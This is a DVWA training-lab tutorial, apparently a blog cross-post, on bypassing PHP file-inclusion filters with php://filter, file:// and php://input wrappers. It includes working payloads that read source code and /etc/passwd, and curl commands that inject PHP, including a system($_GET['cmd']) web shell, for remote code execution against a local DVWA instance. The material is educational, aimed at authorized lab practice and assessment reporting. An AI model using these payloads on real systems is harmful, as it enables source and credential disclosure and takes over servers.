π° Originally published on SecurityElites β the canonical, fully-updated version of this article.
π§ͺ DVWA LAB SERIES
FREE
Part of the DVWA Lab Series β 30 Labs
Lab 17 of 30 Β· 56.7% complete
β οΈ Local Lab Only: PHP wrapper techniques must only be practised against your own DVWA installation. These techniques on unauthorised systems are illegal.
DVWA file inclusion advanced lab 2026 :β Lab 5 gave you basic LFI using path traversal at Low security. Medium security adds a filter that strips ../ sequences. High security extends that filter further. Neither level blocks PHPβs built-in protocol wrappers β and those wrappers do not use path traversal at all. php://filter reads and encodes source code. php://input executes code from your POST body. data:// includes inline content. None of these need ../. The filter blocks what it knows about. These wrappers are something different entirely.
π― What Youβll Learn in Lab 17
How php://filter bypasses path traversal filters to disclose source code
How php://input converts LFI to RCE when allow_url_include is enabled
How data:// wrapper inlines code execution payloads
Read High security source to identify what is blocked and what bypasses remain
Understand why blacklist filtering fails against PHPβs extensive wrapper ecosystem
β±οΈ 40 min Β· 3 DVWA exercises ### β Prerequisites - Lab 5: File Inclusion basics β Low security LFI understood - Lab 14: Security Levels β comfortable reading PHP source - DVWA running locally (Lab 1: Setup) ### π DVWA File Inclusion Advanced Lab 17 Contents β PHP Wrapper Bypasses 1. Medium Security β What the Filter Strips 2. php://filter β Source Code Disclosure 3. php://input β LFI to RCE 4. High Security β Extended Blacklist and Remaining Bypasses In Lab 5 you read /etc/passwd using ../../../ path traversal at Low security. Lab 17 applies the same wrapper bypass philosophy as Lab 16βs command injection filter bypass β blacklists block known strings, not equivalent alternatives. The DVWA Lab Series shows this pattern across every vulnerability type.
Medium Security β What the Filter Strips
MEDIUM SECURITY SOURCE β LFI FILTERCopy
DVWA Medium security filter (View Source reveals this):
$file = str_replace( array( β../β, β..β ), ββ, $file );
Only strips: ../ and .. sequences
Does NOT block: php://, file://, http://, data://, etc.
BLOCKED payloads (contain ../)
?page=../../../../etc/passwd β stripped β no traversal
WORKING payloads (no ../ required)
?page=php://filter/convert.base64-encode/resource=../hackable/flags/fi.php
?page=php://filter/read=string.rot13/resource=index
?page=file:///etc/passwd # file:// wrapper (absolute path)
β‘ EXERCISE 1 β DVWA (15 MIN)
Use php://filter to Read DVWA Source Code at Medium Security
β±οΈ Time: 15 minutes Β· DVWA Medium security
php://filter SOURCE CODE DISCLOSURECopy
Step 1: Set DVWA to Medium security
Step 2: Navigate to File Inclusion module
Step 3: In URL bar, change the page parameter:
http://localhost/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index
This reads index.php and outputs it base64-encoded
Output: PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg==β¦ (long base64 string)
Step 4: Decode the base64 output
echo βPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg==β | base64 -d
<?php β¦ // PHP source code of index.php revealed
Step 5: Read the file inclusion source file
Step 6: Try reading a configuration file
Result: /etc/passwd contents base64-encoded in page output
β What you just learned: php://filter bypasses the Medium security path traversal filter entirely because it does not contain ../ sequences. The base64-encode filter chain is particularly useful because it prevents PHP from executing the included file (which would happen with a normal include of a PHP file) and instead outputs its raw source. This makes php://filter the primary tool for source code disclosure β reading PHP files that would otherwise execute (and reveal nothing) instead of displaying their source. In a real web application assessment, php://filter source disclosure often reveals database credentials, API keys, and internal logic that enables further exploitation.
πΈ Screenshot the base64-encoded output and decoded source code. Share in #dvwa-labs on Discord.
php://input β LFI to RCE
The php://input wrapper reads the raw POST request body. When used as the file parameter in an include() call, if PHPβs allow_url_include=On is set (which is DVWAβs intentional misconfiguration at Low and Medium security), the application includes the POST body as PHP code and executes it. This converts an LFI into Remote Code Execution.
β‘ EXERCISE 2 β DVWA (12 MIN)
Exploit php://input for Code Execution at Medium Security
β±οΈ Time: 12 minutes Β· DVWA Medium Β· Burp Suite or curl
php://input RCE EXPLOITCopy
Method 1: Using curl β POST PHP code to php://input
curl -s βhttp://localhost/dvwa/vulnerabilities/fi/?page=php://inputβ \
βcookie βPHPSESSID=YOUR_SESSION; security=mediumβ \
βdata β<?php phpinfo(); ?>β
Response: full phpinfo() output β confirms PHP code execution
Step 2: Run a command via php://input
curl -s βhttp://localhost/dvwa/vulnerabilities/fi/?page=php://inputβ \
βcookie βPHPSESSID=YOUR_SESSION; security=mediumβ \
βdata β<?php system(βidβ); ?>β
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Step 3: In Burp β intercept any request to the LFI page
Change GET to POST, change page parameter to php://input
Add request body: <?php system($_GET[βcmdβ]); ?>
Then: ?page=php://input&cmd=whoami
Check allow_url_include setting:
curl βdata β<?php echo ini_get(βallow_url_includeβ); ?>β [url]?page=php://input
β What you just learned: php://input demonstrates the critical difference between LFI (read files) and RCE (execute code). The transition from reading /etc/passwd to executing arbitrary commands via the POST body is the escalation path that makes file inclusion vulnerabilities Critical severity in production assessments. The allow_url_include check is essential context for reporting: LFI without allow_url_include enabled is High severity (sensitive file disclosure); LFI with allow_url_include enabled is Critical (remote code execution). Always check this configuration setting and include it in the impact assessment section of your report.
π Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites β
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)